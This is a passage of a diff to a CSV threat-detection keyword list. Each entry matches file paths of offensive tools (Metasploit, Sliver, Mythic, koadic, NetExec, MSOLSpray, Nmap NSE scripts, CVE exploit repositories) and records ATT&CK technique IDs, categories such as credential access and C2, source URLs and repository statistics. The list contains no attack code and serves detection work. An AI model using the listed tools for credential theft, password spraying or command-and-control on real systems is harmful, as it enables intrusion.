Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mRemoteNG-Decrypt*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" "*/mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mr-Un1k0d3r/*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*/Mr-xn/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*/MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" -"*/msf.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/msf.swf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msfcrawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msfpc.sh*","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1127","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" -"*/msftest/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msfvenom/*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/msf-ws.log*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/msf.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/msf.swf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfcrawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfpc.sh*","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*/msftest/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfvenom/*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msf-ws.log*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/MsgKitTestTool/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/Mshikaki.git*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "*/mshta.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/mshtajs.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*/msi-search.git*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to 
download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*/msLDAPDump*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" -"*/MSOLSpray*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*/msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/MSOLSpray*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" "*/msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/mssqlexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/mssqlexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/ms-sql-hasdbaccess.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4395,7 +4429,7 @@
 "*/mtrace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/MultiPotato.git*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
 "*/murmur-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/mushishi.h*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/mushishi.h*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/mysql-audit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/mysql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/mysql-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -4409,27 +4443,28 @@
 "*/mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/Mystikal.git*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
 "*/mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
-"*/Mythic/mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
-"*/Mythic_CLI*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
